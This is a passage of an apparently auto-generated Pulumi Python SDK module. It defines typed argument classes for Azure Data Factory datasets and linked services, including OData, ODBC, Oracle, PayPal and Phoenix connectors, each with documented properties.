class ODataResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
path: Optional[Any] = None,
structure: Optional[Any] = None):
"""
The Open Data Protocol (OData) resource dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any path: The OData resource path. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ODataResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if path is not None:
pulumi.set(__self__, "path", path)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def path(self) -> Optional[Any]:
"""
The OData resource path. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[Any]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class OdbcLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
credential: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Open Database Connectivity (ODBC) linked service.
:param Any connection_string: The non-access credential portion of the connection string as well as an optional encrypted credential. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any authentication_type: Type of authentication used to connect to the ODBC data store. Possible values are: Anonymous and Basic. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] credential: The access credential portion of the connection string specified in driver-specific property-value format.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Basic authentication.
:param Any user_name: User name for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'Odbc')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if credential is not None:
pulumi.set(__self__, "credential", credential)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The non-access credential portion of the connection string as well as an optional encrypted credential. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
Type of authentication used to connect to the ODBC data store. Possible values are: Anonymous and Basic. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def credential(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access credential portion of the connection string specified in driver-specific property-value format.
"""
return pulumi.get(self, "credential")
@credential.setter
def credential(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "credential", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class OracleLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Oracle database.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'Oracle')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class OracleTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The on-premises Oracle database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the on-premises Oracle database. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'OracleTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the on-premises Oracle database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class OrcFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Optimized Row Columnar (ORC) format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'OrcFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class ParameterSpecificationArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
default_value: Optional[Any] = None):
"""
Definition of a single parameter for an entity.
:param pulumi.Input[str] type: Parameter type.
:param Any default_value: Default value of parameter.
"""
pulumi.set(__self__, "type", type)
if default_value is not None:
pulumi.set(__self__, "default_value", default_value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Parameter type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="defaultValue")
def default_value(self) -> Optional[Any]:
"""
Default value of parameter.
"""
return pulumi.get(self, "default_value")
@default_value.setter
def default_value(self, value: Optional[Any]):
pulumi.set(self, "default_value", value)
@pulumi.input_type
class ParquetFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Parquet format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'ParquetFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class PaypalLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Paypal Service linked service.
:param Any client_id: The client ID associated with your PayPal application.
:param Any host: The URL of the PayPal instance. (i.e. api.sandbox.paypal.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your PayPal application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Paypal')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your PayPal application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the PayPal instance. (i.e. api.sandbox.paypal.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your PayPal application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class PaypalObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Paypal Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PaypalObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class PhoenixLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Phoenix server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism used to connect to the Phoenix server.
:param Any host: The IP address or host name of the Phoenix server. (i.e. 192.168.222.160)
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Phoenix server. (i.e. /gateway/sandbox/phoenix/version). The default value is hbasephoenix if using WindowsAzureHDInsightService.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
